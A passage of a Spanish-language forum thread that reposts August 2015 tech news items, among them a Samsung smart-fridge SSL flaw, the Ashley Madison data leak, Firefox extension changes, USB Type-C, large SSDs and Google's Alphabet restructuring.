En definitiva, hablamos de una tecnología que está por ver si finalmente llega a los dispositivos móviles, pero que sin duda se trata de un desarrollo gigante para el problema de las baterías actuales. Se especula también que la compañía británica estaría trabajando muy de cerca con Apple para una posible implementación en futuros smartphones, pero ni Apple ni Inteligent Energy han comentado nada al respecto.

Fuente:
http://www.elotrolado.net/noticia_crean-la-primera-bateria-de-hidrogeno-para-iphone-que-permite-una-semana-de-uso-sin-carga_27032
#77
Investigadores de una firma de seguridad descubren un fallo de seguridad en un frigorífico inteligente de Samsung que posibilita que las contraseñas de Google puedan ser robadas

Internet de las Cosas está pensado para proporcionar mayor comodidad a los habitantes de un edificio. Estructura y electrodomésticos se conectan a la red para automatizar tareas, aprender de nuestros hábitos y ser más eficientes. Lo que ocurre es que también pueden convertirse en un problema, ¿o pensabas que estaban libres de peligro de ser hackeados?
La nevera de Samsung que te puede dejar frío

El frigorífico inteligente RF28HMELBSR de Samsung cuenta con, entre otras, la capacidad de poder sincronizarse con la información que el usuario carga en Google Calendar para ser visualizada en su pantalla. Este y otros electrodomésticos inteligentes de la marca coreana, están controlados por la aplicación Samsung Smart.

La cuestión es que dicho programa falla validando los certificados SSL, permitiendo que alguien que ataque la red local pueda hacerse con datos personales del usuario al estar al descubierto. Entre ellos, evidentemente, la contraseña de Gmail y del resto de servicios gestionados por Google.

El fallo de seguridad ha sido descubierto por Pen Test Partners, un grupo de investigadores en seguridad informática que mostraron el resultado de su trabajo con la nevera de Samsung durante la pasada conferencia DEF CON en una ponencia sobre Internet de las Cosas.

Según Ken Munro, investigador de esta empresa, un atacante puede robar las credenciales de Google de cualquiera.



https://twitter.com/aglongo/status/636086708568653824/photo/1

No te vayas sin leer: ¿Qué es capaz de hacer el primer frigorífico inteligente con Ubuntu? ¿Es seguro Internet de las Cosas?

No es la primera vez que Pen Test Partners pone en entredicho la seguridad de Samsung. El febrero pasado publicaron una investigación que revelaba que los televisores inteligentes de esta marca eran incapaces de cifrar las grabaciones de voz enviadas a través de Internet. La empresa dice que se ha puesto a trabajar para solucionar el problema.

Y es cierto que uno puede pensar en lo inocente de una nevera conectada a Internet. ¿Quién querría saber a qué temperatura enfrío mi cerveza? La cosa es que no deja de ser un aparato más conectado a la red y con acceso a nuestras credenciales que dan paso a nuestra información personal. Por tanto, es una cosa muy seria lo de la seguridad de cualquier dispositivo, no sólo frigoríficos, que esté integrado en el ecosistema de la Internet doméstica.

Fuente:
http://www.malavida.com/noticias/la-nevera-que-hace-peligrar-la-contrasena-de-gmail-005483
#78
Parece complicado debido al gran número de páginas que lo contienen, pero los últimos movimientos de las grandes empresas podrían acabar dejando el plugin de Adobe Flash en el pasado. Hoy es Amazon la que se ha sumado al "boicot" anunciando que desde el próximo 1 de septiembre eliminará y no permitirá el uso de Flash en los anuncios en el interior de sus páginas.

De esta forma se une a la recientes iniciativas de Chrome, Firefox y Safari anunciando que dejaban de lado el plugin, en la mayoría de las casos alegando su poca fiabilidad. Mozilla fue el primero deshabilitando Flash por defecto, en este caso aludía a motivos de seguridad. Del mismo modo, Safari obliga actualmente a los usuarios a actualizar el plugin a la última versión o desactivarlo por completo.

Un movimiento que busca la adopción de HTML5 para el uso extensivo de elementos interactivos en los anuncios online, básicamente uno de los últimos "bastiones" con los que Flash se mantiene con vida. La decisión de Amazon de dejar de apoyar el plugin podría ser un nuevo paso hacia un futuro en la red libre de Flash. Una decisión que se pondrá en marcha el 1 de septiembre y que han explicado a través del siguiente comunicado:

CitarA partir del 1 de septiembre de 2015, Amazon ya no acepatrá los anuncios con Flash en Amazon.com y los dominios propiedad de la empresa. Esto se debe a las recientes actualizaciones del navegador Google Chrome y a las configuraciones realizadas en los navegadores Mozilla Firefox y Safari, las cuales limitan el contenido de Flash que se muestra en las páginas web. Este cambio asegura que los clientes puedan seguir teniendo una experiencia positiva a través de Amazon y de sus afiliados, y que los anuncios se muestren correctamente obteniendo un rendimiento óptimo.

Fuente:
http://www.elotrolado.net/noticia_amazon-anuncia-que-eliminara-flash-en-los-anuncios-a-partir-del-1-de-septiembre_27024
#79
Mozilla ha anunciado importantes cambios de cara al futuro de Firefox. El más relevante de ellos es la adopción de una nueva API para las extensiones, que permitirá a Firefox ejecutar las que sean compatibles con los navegadores basados en Blink como Chrome y Opera.

La nueva API, conocida como WebExtensions, facilitará a los desarrolladores la creación de extensiones y solo deberán hacer unos pequeños cambios en su código para que el complemento funcione en Firefox. La parte negativa es que deberán hacer grandes modificaciones en las actuales extensiones para que sigan funcionando correctamente.

Con el lanzamiento de Firefox 41 previsto para el 22 de septiembre, Mozilla empezará a validar todas las extensiones. El proceso será manual y la aprobación podría tardar, pero se espera que el 15 de diciembre con la llegada de Firefox 43, la versión que funcionará con la nueva API, el proceso sea mucho más rápido.

Electrolysis, una tecnología que provocará que Firefox funcione de forma similar a Google Chrome

También se ha anunciado la intención de que Firefox se aproveche de la tecnología Electrolysis. Esta se encargará de que el navegador separe las tareas en múltiples procesos (igual que hace Chrome) mejorando la estabilidad y seguridad. Algunos complementos no son compatibles con Electrolysis, motivo por el cual se anima a los desarrolladores a probar su código.

Fuentes:
http://www.elotrolado.net/noticia_firefox-podra-ejecutar-extensiones-de-chrome_27029
https://blog.mozilla.org/addons/2015/08/21/the-future-of-developing-firefox-add-ons/
http://www.redeszone.net/2015/08/23/los-ultimos-cambios-en-firefox-lo-acercan-a-google-chrome/
#80
Por lo general la mayoría de los ejecutables que descargamos desde Internet suelen ser cerrados, es decir, no podemos analizar su código para comprender su funcionamiento. Aunque los principales antivirus son capaces de detectar la mayoría de las amenazas actuales, es posible que algunos ejecutables, aunque no sean malware propiamente dicho, puedan realizar ciertas acciones peligrosas en nuestro sistema. Para poder analizar el comportamiento de estas aplicaciones, aunque sean de código cerrado, podemos utilizar PeStudio.

PeStudio es una herramienta desarrollada para poder analizar fácilmente todo tipo de archivos ejecutables (de los cuales no podemos ver el código fuente), identifica la información relevante sobre el funcionamiento de los mismos y nos la muestra en una ventana ordenada y relativamente sencilla de comprender, pudiendo saber qué módulos de los ejecutables pueden ser peligrosos para nuestro ordenador.

Podemos descargar PeStudio de forma gratuita desde su página web principal:

https://winitor.com/

Esta herramienta está libre de software no deseado y es portable, por lo que no requerirá instalación en el sistema.

Cuando ejecutamos esta herramienta por defecto la veremos vacía, a la espera de recibir el archivo que vamos a analizar.


Para cargar un archivo en ella simplemente debemos arrastrarlo a la ventana. En unos instantes veremos cómo nuestro programa se llena de información. La ventana principal de este programa se divide, principalmente, en la parte lateral izquierda, donde tendremos los diferentes módulos del programa y la parte central, donde veremos la información.


El programa nos mostrará automáticamente la información relevante de color naranja o rojo para poder identificar fácilmente cualquier indicio de sospecha. En nuestro caso hemos analizado el binario del programa AdwCleaner que, como trabaja a un nivel bastante interno del sistema operativo, el propio PeStudio lo identifica como peligroso.

PeStudio analiza la seguridad de los ejecutables con VirusTotal

A todas las opciones básicas de análisis de archivos binarios que nos permite esta herramienta ahora debemos añadirla el motor de análisis en VirusTotal.

Las versiones más recientes de PeStudio añaden un módulo que analizará automáticamente nuestro archivo en la plataforma de VirusTotal para poder identificar posibles amenazas ocultas en ella. Para consultar estos resultados no tenemos más que abrir la aplicación, cargar un archivo en ella y seleccionar la pestaña "VirusTotal".

Fuente:
http://www.redeszone.net/2015/08/22/analiza-ficheros-exe-antes-de-ejecutarlos-con-pestudio
#81


Microsoft ha anunciado a través de su blog la llegada de la beta pública del asistente digital Cortana para usuarios Android. Una primera fase de implementación por la que los usuarios del sistema operativo móvil de Google ya pueden comenzar a probar la aplicación.

El anuncio forma parte de lo ya anunciado en el mes de mayo, momento en el que los de Redmond dijeron que Cortana llegaría a Android e iOS. La beta está disponible únicamente para usuarios en Estados Unidos, aunque la compañía ha explicado que pronto estará lista también para el resto de usuarios.

En cuanto a características, Microsoft presenta la app como el compañero perfecto para los usuarios de Windows 10, extendiendo las bondades del asistente a cualquier dispositivo que llevemos con nosotros. Una aplicación que en teoría permitirá hacer la mayoría de funciones que ya hace la versión "nativa" de escritorio o para Windows Phone. Es decir, búsquedas webs sobre la marcha, establecer u obtener recordatorios, seguimiento de información o detalles sobre vuelos.

A la vez, se han añadido mejoras en la experiencia de uso desde el lanzamiento de la beta cerrada, incluyendo ahora la posibilidad de configurar el asistente como destino a la hora de presionar el botón de inicio, un modo que permite la activación de Cortana a la "distancia de un clic".

Ahora sólo queda esperar a que todos los usuarios puedan acceder a esta beta pública que se inicia en Estados Unidos y para la que Microsoft ha añadido un enlace para su descarga.

Fuentes:
http://www.elotrolado.net/noticia_microsoft-lanza-la-beta-publica-de-cortana-para-android_27038
http://blogs.windows.com/bloggingwindows/2015/08/24/cortana-now-available-on-android-in-public-beta/
#82
Noticias / Windows 95 cumplió ayer 20 años
25 Agosto 2015, 16:46 PM



Cumple años Windows 95, uno de los sistemas operativos más importantes de la historia. Lanzado oficialmente el 24 de agosto de 1995, esta fue una de las versiones más revolucionarias y ambiciosas de la saga de Microsoft, puesto que marcó un antes y un después sustituyendo a MS-DOS como sistema operativo y a Windows 3.x como entorno gráfico.

Hace veinte años, el nuevo entorno de escritorio de Windows 95 trajo consigo por primera vez un elemento que ha conseguido sobrevivir hasta nuestros días: El menú de inicio. Como lo leéis, este fue el primer Windows en el que podíamos acceder a una lista en la que se nos mostraban todas las aplicaciones instaladas para poder ejecutarlas desde allí.

Windows 95 también termino de asentar la utilización de archivos de 32 bits que se empezó a ver en las versiones 3.x, e introdujo el sistema Plug and Play para que pudiéramos utilizar hardware y periféricos nada más conectarlos y sin tener que pasar primero por un complejo proceso de instalación.

Estoy seguro que los que ya pasáis de la treintena aun podréis escuchar la característica música de inicio de sesión de este Windows. ¿Cuales son los mejores recuerdos que os evoca hablar sobre este sistema operativo? ¿Hay algo de él que echéis de menos en las versiones actuales de Windows?

Fuente:
http://www.genbeta.com/sistemas-operativos/windows-95-cumple-20-anos-la-imagen-de-la-semana

15 cosas que jamás olvidaremos de Windows 95




1. Windows 95 era barato y accesible cuando salió en 1994.
2. Las computadoras de ese entonces era miles de veces más primitiva que las actuales.
3. Windows 95 popularizó los videojuegos en PC...
4. ...y este súper genial título de futbol lo demostraba.

[youtube=640,360]https://www.youtube.com/watch?v=L4ExnyASOzE[/youtube]

5. Se usó el tema de los Rolling Stones, "Start Me Up", para anunciar Windows 95 prometía un futuro emocionante y al alcance de todos.
6. Tenía juegos como Buscaminas y Solitario.
7. ¿Recuerdas la configuración de 16 bits para computadoras lentas?
8. Esta criatura infernal apareció en nuestras vidas en Windows 95



9. Algunos personajes de la serie televisiva Friends aprendieron a usar Windows 95 en este video promocional.
10. Gracias a Windows 95 existe el botón de Inicio y la barra de tareas.
11. En él conocimos Internet Explorer.
(Que aunque ya desapareció, hace 15 años era el explorador que el 95% de las personas usaba.)
12. En aquellos días, necesitamos una conexión telefónica para acceder a Internet.
13. Windows 95 también tenía su encantadora colección de errores.
14. Así como también la infame pantalla azul de la muerte.
15. ¿Recuerdas este protector de pantalla?



Nunca te olvidaremos, Windows 95.

Fuente:
http://www.swagger.mx/tecnologia/cosas-que-jamas-olvidaremos-de-windows-95
#83


Ya hablábamos hace poco de cómo el coste por gigabyte se había reducido de forma significativa en las unidades SSD en los últimos años, y esa evolución de la tecnología irá a más en los próximos años. Tendremos unidades cada vez más rápidas y cada vez más competitivas en precio en un sector que podría hacer olvidar a los discos duros tradicionales más pronto que tarde.

Es lo que parece si uno hace caso de las estimaciones de Toshiba, que ha publicado una singular diapositiva en el evento Flash Memory Summit en el que los fabricantes de memorias nos muestran sus avances. Según los responsables de esta firma, Toshiba dispondrá de unidades de 128 TB (terabytes, chicos, no gigabytes) dentro de tres años.


Llega la tecnología QLC

Una de las bases de ese logro será el uso de la tecnología Quadruple Level Cell que permitirá 4 bits por célula de datos, mientras que hoy en día se hace uso de las tecnologías TLC (Triple Level Cell) o 3-bit MLC (3-bits Multi-level Cell). Con esa opción es posible aumentar la densidad de datos y a eso se sumarán las tecnologías de fabricación que permitirán también mejorar esa integración de más y más chips para el almacenamiento de datos.

El anuncio de la tecnología QLC ha sido una sorpresa para los asistentes a ese evento, ya que hasta la fecha los obstáculos técnicos para lograr ese tipo de célula habían sido difíciles de superar. Aún así algunos dudan del futuro de una tecnología que tiene también desventajas: el aguante de las unidades es menor ya que las células se descastan con mayor rapidez, y puede que el rendimiento en lecturas y escrituras no pueda competir con sus alternativas.

Aún así es posible que estas unidades se conviertan en una alternativa mucho más atractiva a los actuales discos duros de gran capacidad: superarán todas sus prestaciones y podrán ser perfectos para el archivado de grandes volúmenes de datos. Si necesitamos rapidez también tendremos SSDs cada vez más veloces, así que el futuro, de nuevo, es brillante para estas unidades.

Fuente:
http://www.xataka.com/componentes/toshiba-quiere-ofrecer-unidades-ssd-de-128-tb-en-2018
#84
Noticias / USB 3.1 y USB Type-C
24 Agosto 2015, 11:19 AM


Desde hace ya algunos meses, nos hemos acostumbrado a escuchar o leer las palabras USB 3.1 y USB Type-C. La lógica nos invita a pensar que es algún tipo de cambio en el USB que usamos normalmente y nos olvidamos hasta que recibimos el primer dispositivo que cuenta con uno de ellos, algo que por el momento no es muy habitual.

Desde hace años, el USB ha sido un estándar muy usado a la hora de transferir datos gracias a su facilidad de implementación y funcionamiento. Con él hemos podido, desde pasar las fotos de la cámara hasta cargar nuestros nuevos teléfonos, un gran abanico de posibilidades que realmente nos han facilitado mucho la vida. Pero como acostumbra a pasar, todo evoluciona, incluso las conexiones y los cables.

Hace ya unos años, a medida que los contenidos iban creciendo en tamaño, se vio la necesidad de realizar mejoras en la primera versión del USB, algo que se repitió hasta llegar a la versión 3.0. Con ella podíamos transferir archivos de gran tamaño a una velocidad mucho más alta y, pese a que ya lleva unos años entre nosotros, es ahora cuando vemos que la gran mayoría de nuevos dispositivos lo incluyen (aunque no todos).


USB 3.1 y USB Type-C

USB Tipo-C Smartphone

Pero esto no es una clase de historia, así que mejor mirar al presente y futuro y aquí es cuando llegamos a los protagonistas de este artículo. Para empezar, me gustaría aclarar las diferencias que hay entre una cosa y otra, puesto que se presta a confusión y en muchos sitios podemos ver un mal uso de sus nombres.

En primer lugar, USB 3.1 simplemente define una nueva versión del estándar y se refiere a la tecnología, a cómo funciona. Tenemos que hablar de USB Type-C si nos estamos refiriendo a la forma que tienen los conectores, que en este caso se referirá al nuevo conector reversible.

Y es precisamente la reversibilidad la principal novedad que presenta el USB Type-C. De esta manera, se elimina uno de los principales problemas del USB original, puesto que la famosa "Ley de Murphy" dictaminaba que siempre intentaremos poner el conector al revés de como debería.


Al tener una nueva forma esto hace que necesitemos otro conector de tipo C para poder conectar un cable, no siendo compatible conectarlo en alguno de los actuales. Es decir, que no podremos conectar los nuevos cables en los conectores USB tradicionales o la situación inversa.

En lo que al USB 3.1 se refiere, ya hemos dicho que se trata de una tecnología y en este caso sí que será compatible con las anteriores versiones. Eso sí, como ya ocurría anteriormente, en el caso de conectar un cable USB 3.1 a un conector USB 2.0, siempre tendremos que conformarnos con las características de la peor de las dos tecnologías, en este caso marcada por el USB 2.0.

En definitiva, una cosa no dependerá de la otra. Así, podremos tener cables USB Type-C que usen tecnologías anteriores. Un ejemplo lo encontramos en teléfonos recién estrenados como el OnePlus 2, que pese a contar con un conector USB Type-C, sigue haciendo uso de la ya antigua tecnología USB 2.0.

¿Qué ventajas ofrecen ambas novedades?

Pero son más las novedades que vamos a encontrar El USB Type-C, además de estar diseñado para poder usar la última tecnología disponible (USB 3.1), también puede transmitir señales DisplayPort de hasta 4K de resolución y hasta 100W de energía. Sin lugar a dudas, unas novedades que lo hacen muy interesantes y que lo pueden convertir en un auténtico referente en la industria ya que incluso puede sustituir otros cables como el de alimentación, algo que ya vemos en los nuevos Google Cromebook Pixel.

comparativa velocidades USB



Y en lo que al USB 3.1, ya hemos indicado antes que uno de los principales objetivos de estas mejoras en la tecnología era poder lidiar con el gran tamaño de los archivos multimedia actuales. En la primera versión del USB solo se podía transmitir a una velocidad de 12 Mbps, algo que con la versión 2.0 aumentó hasta los 480 Mbps y que en la última, la 3.0, ya había llegado hasta los 5 Gbps. Con la versión 3.1 esta tasa aumenta y ya llegamos a los 10 Gbps (7,2 Gbps en las pruebas reales).

Pero tranquilos, estas cifras difícilmente podremos verlas en nuestros dispositivos, puesto que hay más factores que van a limitar la velocidad de la transferencia. Y es que los datos estarán almacenados en un disco duro o un chip, los cuales también tienen una tasa máxima de lectura o escritura, por lo que lo normal será estar limitado por alguno de estos elementos. Pero pudiendo llegar a 300 MBps tampoco vamos a quejarnos, ¿no?


Energía eléctrica a través de USB, suena bien, ¿no?

En concreto, como podemos leer en Phone Arena, se crearán hasta 6 perfiles de entrega de potencia, aunque el primero de ellos (Perfil 0) esté reservado y no se haga uso de él. Con ellos podremos ver unos niveles escalados que pueden llegar a entregar hasta los 100W que mencionábamos antes.

    Perfil 1: 5V y 2A – 10W
    Perfil 2: 12V y 1,5A – 18W
    Perfil 3: 12V y 3A – 36W
    Perfil 4: 20V y 3A – 60W
    Perfil 5: 20V y 5A – 100W

Estos perfiles, que reciben el nombre de USB PD, son una tercera especificación que debemos añadir al USB Type-C y al USB 3.1 de los que ya hemos hablado. Así pues, el tener un USB Type-C y/o un USB 3.1 no será una garantía de poder disponer del USB PD, por lo que esta no será la solución para cargar más rápido ninguno de los teléfonos actuales. Pero todo llegará, de eso no hay que dudar.


En resumen, es mejorar algo que ya hemos empezado a ver hace poco con el Quick Charge que ofrecen algunos fabricantes para recargar los dispositivos más rápidamente. En este caso simplemente podemos cargar el teléfono, mientras que con USB PD podremos transmitir datos a la vez que grandes cantidades de energía, todo con el mismo cable y al mismo tiempo.

Y además tiene una peculiaridad muy curiosa, ya que las cargas pasarán a ser reversibles. ¿Qué quiere decir esto? Pues que tanto podremos cargar nuestro teléfono conectándolo al ordenador, como podremos realizar la acción totalmente contraria (algo raro, todo sea dicho de paso).

Eso sí, los cables actuales dejarán de ser útiles y hará falta contar con unos nuevos que contarán con un chip especial. En él se marcará la cantidad máxima de energía que pueden transmitir. Cables más caros, pero que ofrecerán unas características mucho más interesantes que los actuales.

Fuente:
http://andro4all.com/2015/08/usb-3-1-usb-type-c-diferencias
#85


-Un análisis de las direcciones de correo electrónico encontradas en el volcado de datos muestra que unos 15.000 correos de clientes son .mil.o .gov

Los hackers que robaron información confidencial del sitio de citas AshleyMadison.com parecen haber cumplido con su amenaza de publicar los datos.

9,7 gigabytes de datos fueron subidos el martes utilizando una dirección onion. Los archivos parecen incluir detalles de la cuenta y log-ins para unos 32 millones de usuarios de la plataforma de citas para casados. Los datos, que muestran millones de transacciones de pago desde 2007, incluyen nombres, dirección postal, dirección de correo electrónico y la cantidad pagada. AshleyMadison.com afirmó tener cerca de 40 millones de usuarios en el momento de la intrusión hace aproximadamente un mes.

Un análisis de las direcciones de correo electrónico encontradas en el volcado de datos muestra que unos 15.000 correos de clientes son .mil o .gov y una parece pertenecer a un ex primer ministro del Reino Unido. Entre otras se muestran numerosas direcciones de correo que corresponden al Vaticano (218 direcciones), a Harvard (136 direcciones), Yale (22 direcciones), IBM (176 direcciones) y Bank of America (77 direcciones). Es importante señalar que el proceso de registro de Ashley Madison no requiere verificar la dirección de correo electrónico por lo que no todas las direcciones podrían corresponder a sus dueños.

Un muestreo de los datos indica algunos usuarios probablemente proporcionaron nombres y direcciones aleatorias, de cualquier manera, los archivos que contienen las transacciones con tarjeta de crédito si contendrían nombres y direcciones reales (a menos que fueran utilizadas tarjetas prepago anónimas).

Los datos también incluye descripciones de lo que los miembros estaban buscando. "Estoy buscando a alguien que no sea feliz en su casa o simplemente esté aburrido y busque un poco de emoción", escribió uno de los miembros que proporcionó una dirección en Ottawa y el nombre y número de teléfono de alguien que trabaja para la Unión Aduanera y la Inmigración en Canadá.




Según Impact Team, grupo que se atribuye la autoría del robo de datos, el sitio Ashley Madison era sumamente engañoso ya que estaba plagado de falsos perfiles de mujeres (aseguran que un 90-95% de los usuarios reales hombres)."El tiempo se ha acabado", dice Impact Team que exigía a Avid Life Media el cierre de la plataforma.

Por su parte, desde Ashley madison han emitido un comunicado en el que declaran estar investigando la veracidad de los datos y la intención de impedir su distribución.

Fuente:
http://www.adslzoom.com/noticia-hackers-cuelgan-informacion-de-clientes-de-ashley-madison

#86
La próxima actualización del mensajero del avión de papel también contará con las llamadas por VoIP como el resto de apps de mensajería móvil como WhatsApp, Viber y Line, entre otras. La filtración fue dada por Pavel Durov, co-fundador, quien ha publicado a través de Twitter un mensaje en el que destacaba esta novedad en una próxima actualización de Telegram.

Después de comprobar como WhatsApp, la principal aplicación de mensajería móvil conseguía seguir liderando este campo gracias a avances y evoluciones como la inclusión de llamadas por VoIP, otro de los competidores de esta app, Telegram, ha decidido que hará lo propio en los próximos meses.

Con el objetivo de destronar a WhatsApp, 'El mensajero del avión de papel' quiere aumentar su funcionalidad, la cual le ha permitido hacerse con un hueco en este ámbito de las aplicaciones, y ahora quiere seguir alimentando esta usabilidad a través de este servicio de llamadas.

telegramEl chivatazo ha sido dado por uno de sus co-fundadores y fundador de la red social VKontakte, Pavel Durov, quien ha publicado a través de Twitter un mensaje en el que destacaba esta novedad en una próxima actualización de Telegram.

En este sentido, en el mundo de las apps móviles de mensajería, WhatsApp, Viber y Line ya ofrecen a sus clientes la posibilidad de realizar llamadas por VoIP, un grupo del que Telegram no quiere desmarcarse e intentará reengancharse en los próximos meses.

Asimismo, recordemos que, lejos de estas apps, la primera gran empresa que ofertó llamadas por esta vía online fue Skype.

Con esta implementación Telegram conseguiría recortar una importante ventaja respecto al resto de apps para enviar mensajes, sobre todo con WhatsApp, el rey de estas aplicaciones móviles.


Fuente:
http://panavoip.com/news/telegram-implementara-llamadas-por-voip-en-su-proxima-actualizacion/
#87
Samsung es uno de los líderes en la creación de estas memorias y hace sólo unos días anunciaron su último avance: chips de memoria flash 3D V-NAND de 256 Gigabits. Como ya vimos y ellos anunciaron, esta nueva tecnología permitiría crear SSDs más densos y, por tanto, con mayor capacidad y menos consumo.

No se han hecho esperar mucho: Samsung ha anunciado el primer SSD con 16TB de almacenamiento, sí, 16 Terabytes. Esto significa que es la unidad de almacenamiento más grande del mundo, y no sólo de SSD, sino también de discos duros tradicionales, ya que fabricantes como Seagate o Western Digital tienen su tope en 10TB.




El SSD de 16TB es la mayor unidad de almacenamiento del mundo

Como leemos en ArsTechnica, Samsung ha mostrado estos SSD en el Flash Memory Summit que se ha celebrado en California y han conseguido fabricarlos en el tamaño de 2.5 pulgadas gracias al uso de sus nuevas memorias de 32GB NAND por chip.

Por tanto, se calcula que esta unidad debe montar entre 480 y 500 de esos chips alcanzando un almacenamiento real de 15.36TB. Además, aseguran que en la conferencia han mostrado un servidor montando con 48 SSD de 16TB, lo que da una capacidad de 768TB y un rendimiento de 2 millones de operaciones IOPS (Input/Output Operations Per Second).

Veremos cuándo llega este SSD al mercado, pero todo indica que será para uso empresarial y el precio... de 5.000 euros para arriba.

Fuente:
http://www.omicrono.com/2015/08/samsung-presenta-un-ssd-de-16tb-el-mayor-almacenamiento-del-mundo/
#88
En España, se duplicará hasta 2019, alcanzando 17 Exabytes anuales en 2019, según el 'Visual Networking Index Global Forecast and Service Adoption'

En España, se duplicará hasta 2019, alcanzando 17 Exabytes anuales en 2019, según el 'Visual Networking Index Global Forecast and Service Adoption'.




En España, el tráfico IP se multiplicará por 2 en este período, alcanzando 17 Exabytes anuales en 2019 -el equivalente en Gigabytes a que todas las películas producidas en el mundo en toda la historia crucen las redes IP españolas cada cuatro horas- desde los 8 Exabytes anuales registrados en 2014 (tasa de crecimiento interanual del 16%).

Así se desprende de la décima edición del Informe anual Cisco Visual Networking Index (VNI) Global Forecast and Service Adoption 2014-2019, que señala como principales factores de esta evolución el significativo incremento de usuarios de Internet, dispositivos personales y conexiones Máquina-a-Máquina (M2M), la mayor velocidad de la banda ancha y la adopción de servicios de vídeo avanzados.
Proyecciones e impulsores del tráfico global

Cisco prevé que el tráfico IP global alcance los 168 Exabytes mensuales en 2019 (desde los 59,9 Exabytes mensuales registrados en 2014), de manera que el tráfico que cruzará las redes a escala global en 2019 será casi igual a la suma de todo el tráfico de años anteriores (entre 1984 y finales de 2013). Los principales impulsores de este incremento son:

Más usuarios de Internet: A medida que se extienden las redes fijas y móviles, un mayor número de personas tendrán acceso a Internet. En 2019 habrá cerca de 3.900 millones de usuarios de Internet (el 51% de la población mundial prevista: 7.200 millones de habitantes según la ONU). En 2014, el número de internautas a escala global fue de 2.800 millones (el 39% de una población total de 7.200 millones). En España habrá 37,3 millones de usuarios de Internet en 2019 (el 78% de la población), desde los 36,4 millones contabilizados en 2014 (77% de la población).

Más dispositivos y conexiones: Con 24.000 millones de dispositivos/conexiones previstos para 2019 (frente a los 14.000 millones contabilizados en 2014), las redes de los proveedores de servicios deberán adaptarse al creciente número de dispositivos de última generación, incluyendo tablets, smart phones y TV de ultra-alta definición, además de conexiones M2M y dispositivos 'portables' como relojes inteligentes o controladores de salud. En 2019 habrá 3,2 dispositivos/conexiones per cápita a escala global, desde los 2 dispositivos/conexiones por persona registrados en 2014.


En España habrá 307 millones de dispositivos conectados en 2017 (6 conexiones por habitante), desde un total de 155 millones contabilizados en 2014 (3 conexiones per cápita). Estos dispositivos avanzados deberán ser autenticados para obtener acceso a las redes fijas y móviles, lo que requiere mayor capacidad de inteligencia, gestión y seguridad.

En este sentido, es fundamental apoyarse en una completa estrategia de migración a IPv6 para que las operadoras puedan gestionar el creciente volumen y complejidad de los dispositivos y conexiones de nueva generación. El 41% de todos los dispositivos/conexiones fijas y móviles serán compatibles con IPv6 en 2019 (22% en 2014). En España, el 45% de todos los dispositivos/conexiones fijas y móviles serán compatibles con IPv6 en 2019 (34% en 2014).

Mayor velocidad de la banda ancha: Globalmente, la velocidad media de banda ancha fija se multiplicará por 2 entre 2014 y 2019, desde los 20,3 Mbps hasta los 42,5 Mbps. En términos interanuales, la velocidad media de banda ancha fija creció un 26% a escala global entre 2013 y 2014, desde los 16 hasta los 20,3 Mbps. En España, la velocidad media de banda ancha fija se multiplicará por 2 entre 2014 y 2019, desde los 19 hasta los 46 Mbps.

Leer más:
https://www.esmartcity.es/articulos/el-trafico-ip-se-multiplicara-por-3-en-los-proximos-4-anos
#89
Hoy día es raro encontrar algún usuario medio que entra en Internet y que no tiene instalado algún software para bloquear esa tediosa publicidad que puebla prácticamente la totalidad de la red. Según un estudio realizado por PageFair en colaboración con Adobe y del que se hace eco Business Insider, el bloqueo de este tipo de publicidad ha crecido un 41% durante el 2015. Esto supone miles de millones de pérdidas para las empresas que invierten en publicidad y las que viven de ella.

Según el informe de PageFair y Adobe, se calcula que actualmente el número de usuarios que tiene instalado algún software para bloquear la publicidad de las páginas web a nivel mundial asciende a 198 millones. Además, se llega a la conclusión de que los editores han sufrido por ello unas pérdidas de 21.800 millones de dólares solo en 2015, lo que supone un 14% del gasto mundial en publicidad. Los responsables del informe se atreven a predecir que durante 2016 la cifra ascenderá hasta los 41.600 millones de dólares.



Johnny Ryan, jefe de PageFair, ha explicado a Business Insider que "el bloqueo de anuncios ha crecido de forma viral desde 2012". Según se puede ver en las gráficas del estudio, se acusa un gran ascenso desde el año 2014, cuando este tipo de herramientas reflejó un auténtico boom debido a su buena reputación entre los usuarios.

Aunque el uso de software para bloquear publicidad pertenece casi en su totalidad a ordenadores de escritorio, ya se habla de que pronto se convertirá en algo común dentro de la navegación desde el smartphone, ya que actualmente el 38% de la navegación web se realiza desde el teléfono.

La tasa de bloqueo de anuncios varía dependiendo del país. Así, en EE.UU. se estima que son 45 millones los usuarios mensuales que utilizan algún tipo de software para que no muestre la publicidad. Por su parte, en Europa se estima que 77 millones de usuarios usa algún bloqueador al menos una vez al mes.

Podéis descargar el informa en formato pdf en el siguiente enlace.


Fuente:
http://www.elotrolado.net/noticia_el-bloqueo-de-anuncios-en-internet-crecio-un-41-durante-2015_26963
#90
Google Inc. está cambiando su estructura corporativa para separar su buscador, YouTube y otras compañías de Internet de sus divisiones de investigación y de inversión. Las acciones subieron en las últimas operaciones. Alphabet será el nombre de lo que será una nueva compañía holding, dijo la empresa en un blog el lunes. Incluirá Google Inc. y Calico, una unidad separada que incluye Google Ventures, Google capital, Google X y otras filiales.




Alphabet es el nombre de la empresa que Larry Page, fundador y CEO de Google acaba de anunciar en su blog, una empresa "para controlarlas a todas", ya que en realidad se trata de un conjunto de empresas de las cuales Google será la mayor de todas.

Larry Page sale así del cargo de CEO de Google para ser CEO de Alphabet, donde Sergey Bin será presidente. El famoso Sundar Pichai ocupará el cargo de CEO en Google.

¿Qué es Alphabet?

Heredando la filosofía original de Google, Alphabet quiere ser una empresa diferente, creada para "cambiar el mundo". Está formada por otras compañías de las que hemos hablado en varias ocasiones, como Life Sciences (con proyectos relacionados con lentes de contacto que detectan niveles de glucosa), el laboratorio de experimentos (X) o Calico (enfocada en alargar la esperanza de vida de la población).

Pretenden de esta forma tener una mejor gestión, controlando los proyectos de forma independiente, con un CEO diferente dirigiendo cada negocio y Larry y Sergey liderando todo (asignando capital, por ejemplo). Quieren tener un CEO para cada negocio, y ofrecer resultados financieros independientes.

En la web de la nueva empresa, abc.xyz, no hay de momento mucha información, prácticamente la que veis en la captura superior, con una sección para inversores que deja claro que una de las ideas principales es poder independizar los resultados de los negocios.

Estaremos atentos a la evolución de este nuevo proyecto, y de todos los que de allí nazcan.

Fuentes:
http://wwwhatsnew.com/2015/08/10/larry-page-deja-de-ser-ceo-de-google-para-crear-otra-empresa-alphabet/
http://googleblog.blogspot.com.br/2015/08/google-alphabet.html